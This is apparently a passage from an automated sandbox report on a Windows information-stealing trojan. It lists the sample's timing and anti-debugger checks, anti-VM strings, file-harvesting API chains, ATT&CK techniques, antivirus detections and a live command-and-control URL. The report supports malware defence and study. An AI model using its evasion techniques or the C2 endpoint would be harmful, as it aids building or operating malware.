                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB87BB second address: EB87D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007FE478BEC548h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e jbe 00007FE478BEC554h 0x00000014 pushad 0x00000015 jc 00007FE478BEC546h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB70A3 second address: EB70A8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB79A6 second address: EB79AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7B46 second address: EB7B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE478F58EBDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC38EC second address: EC38F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE478BEC546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED7C9B second address: ED7CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED7CA1 second address: ED7CE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC558h 0x00000007 jnl 00007FE478BEC546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE478BEC556h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6905 second address: EE6909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6909 second address: EE6916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6916 second address: EE693A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478F58EC8h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE693A second address: EE693E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE693E second address: EE6952 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE478F58EBAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6952 second address: EE6956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6956 second address: EE695C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6BDB second address: EE6BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6BDF second address: EE6BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6BE5 second address: EE6C11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE478BEC551h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FE478BEC54Fh 0x00000011 push edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6ED3 second address: EE6EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE478F58EB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE71D1 second address: EE71D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE748A second address: EE749A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE749A second address: EE74AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE478BEC546h 0x0000000a je 00007FE478BEC546h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE74AE second address: EE74C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478F58EBFh 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FD2 second address: EE8FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FD8 second address: EE8FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FDE second address: EE8FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FE2 second address: EE9017 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE478F58EC7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9017 second address: EE901B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBE23 second address: EEBE27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED2D4 second address: EED2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED2D8 second address: EED2E4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE478F58EB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEF380 second address: EEF39C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE478BEC556h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEF39C second address: EEF3A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55503F3 second address: 5550402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5550402 second address: 55504EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 3Fh 0x0000000d pushfd 0x0000000e jmp 00007FE478F58EC9h 0x00000013 add ax, 3076h 0x00000018 jmp 00007FE478F58EC1h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FE478F58EC7h 0x00000027 adc ch, FFFFFFAEh 0x0000002a jmp 00007FE478F58EC9h 0x0000002f popfd 0x00000030 mov ecx, 2B924237h 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FE478F58EBFh 0x00000040 add ecx, 213CCBBEh 0x00000046 jmp 00007FE478F58EC9h 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007FE478F58EC0h 0x00000052 or esi, 453E64B8h 0x00000058 jmp 00007FE478F58EBBh 0x0000005d popfd 0x0000005e popad 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55504EA second address: 5550502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC554h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5550502 second address: 5550506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5550506 second address: 555051C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE478BEC54Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555051C second address: 555053B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push ebx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE478F58EC2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555053B second address: 5550541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5550541 second address: 5550545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1110F second address: E1113B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE478BEC557h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1113B second address: E11140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1139A second address: E113A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C5DA67 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C5DB2F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E04F5B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decision graph_0-38671
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009840F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009840F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0097E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0097F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009847C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009847C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00971710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00971710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0097DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00983B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00983B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00984B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00984B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0097EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0097BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0097DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00971160 GetSystemInfo,ExitProcess,0_2_00971160
                Source: file.exe, file.exe, 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareC
                Source: file.exe, 00000000.00000002.2241492320.0000000001843000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2241492320.0000000001876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37484
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37487
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37498
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37503
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37538
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37372
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00974610 VirtualProtect ?,00000004,00000100,000000000_2_00974610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00989BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989AA0 mov eax, dword ptr fs:[00000030h]0_2_00989AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00987690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00987690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5912, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00989790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009898E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_009898E0
                Source: file.exe, file.exe, 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B7588 cpuid 0_2_009B7588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00987D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00986BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00986BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009879E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_009879E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00987BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00987BC0

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.970000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2153163203.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5912, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.970000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2153163203.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5912, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 42% | ReversingLabs | Win32.Trojan.Generic |
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206k | file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.phpt | file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/=c | file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206/6c4adf523b719729.phpYB | file.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/ws | file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/Pc | file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php1B | file.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544173
Start date and time: 2024-10-28 23:47:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 19
• Number of non-executed functions: 131
Cookbook Comments:
• Found application associated with file extension: .exe
